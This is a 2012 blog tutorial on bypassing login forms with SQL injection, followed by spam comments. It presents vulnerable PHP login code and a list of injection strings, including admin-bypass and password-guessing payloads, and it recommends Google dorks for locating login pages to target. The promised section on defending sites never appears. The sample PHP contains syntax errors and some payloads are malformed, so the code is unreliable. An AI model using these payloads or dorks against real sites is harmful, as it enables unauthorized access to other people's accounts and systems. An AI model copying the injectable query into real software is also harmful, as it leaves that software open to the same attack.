Pages

Thursday, May 17, 2012

SQL injection bypass the login form

In this tutorial I will be explaining What is SQL(Its structure), what is SQL injection? how to perform the attack? and how to make your website safe from such kinds of attacks. Before you read any article on sql injection I recommend you to read this first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is most widely used language and and in most of the cases MySQL is used as database with PHP. PHP is a web scripting language like ASP, JSP, CGI....You need not learn this attack in every language, the concept of attack remains same for all the languages.

Basics of SQL:
The structure of SQL is divided into:
SQL server-> Databases->Tables-> Columns and Rows.
Sql server: is an application which runs on server side of the application and serves the request as per the command given in client side.
Database: This is a kind of container where particular applications related tables are kept.
Tables: It stores the data in the form of rows and columns.

SQL Injection: Introduction

It is the most widely used technique of hacking since most of the websites today maintain database. SQL Injection is a code(sql) injection technique because of the improper filtration of users input. Lets see a basic injection attack:


Bypassing the login form:
Lets consider a login form login.php

if (isset($_POST['submit']))
{
$username=$_POST['username'];
$password=$_POST['pass']
$check=mysql_query("SELECT * FROM member WHERE username = ' $username' and password=$password");
$check2 = mysql_num_rows($check);

if ($check2 == 0)
     echo "login failed";
else
header("location: members.php);
}
else
{
<form action="login.php" method="post" name="login"> 
<h1>USERLOGIN</h1><br/>
Username:<input type="text" name="username"> 
<br/><br/>
Password:
<input type="password" name="pass"<input type="submit" name="submit" value="Login"> </form> 


This is not the exact login form just to give you a feel how exactly login form works i have written this code. Just focus on the dark shaded portions of the code, as you can see the login details is sent via "post" method as soon as the submit button is clicked, after clicking the submit button the PHP code will run as "isset" condition is true. Now lets see what happens in the background, the select function tries to fetch the details from the "member" table by comparing the username and password sent from to the username and password inside the member table. Clearly the code which I have written is vulnerable, lets see how?
Consider a situation I have given input something like below:
Username: ' or 'a'='a'
Password: ' or 'a'='a'
Now lets see what happens in the background i.e. in select staement:
select * from member where username=' ' or 'a'='a' and password=' ' or 'a'='a'
Now if you see carefully the two shaded portions, they both results "true". That means our username and password is accepted.
Some other username and password combination which can come handy for SQL injection:


Username: ' or 'a'=a');--
Password: anything



Username: ' or 'a'=a';--
Password: anything

select * from member where username=' ' or 'a'='a');-- and password=' ' or '1'='1'
the command after "--" will act as comment.


Bypassing admin login form. In most of the cases the cases the username for administrator field is "admin" which can be useful when we are injecting code. Lets see:
Username: admin;--
Password: anything



Username: admin);--
Password: anything


Now consider a situation where you know the username and few letters of password, in such cases you can try the following:


Username:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='
password:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='


We can use google dorks to find login page:
Example type: inurl:login or inurl:login.php or inurl:adminlogin or intitle:login in Google search box.

Note: It is not necessary that these combinations will always work. It will depend on the way the script engine is programmed.

4 comments:

  1. I am interested in SQL injection to maintain secure and safe networks as well as secure software.This is very helpful information.

    ReplyDelete
  2. Asking quеѕtions aгe aсtuаllу fastidіοus thing if yοu are nоt understandіng something tοtally,
    but thіs artiсle gives pleasant undeгstanding even.


    Ϻy blog :: each рlay []

    ReplyDelete
  3. It's in reality a nice and helpful piece of info. I am glad that you just shared this useful info with us.

    Please stay us up to date like this. Thank you for
    sharing.

    my web page - sump pump backup water powered (sump-pump-installation.net)

    ReplyDelete
  4. I savor, result in I found exactly what I used to be looking for.
    You've ended my 4 day long hunt! God Bless you man. Have a great day.
    Bye

    Here is my blog post: factor quema grasa bajar gratis

    ReplyDelete

Related Posts Plugin for WordPress, Blogger...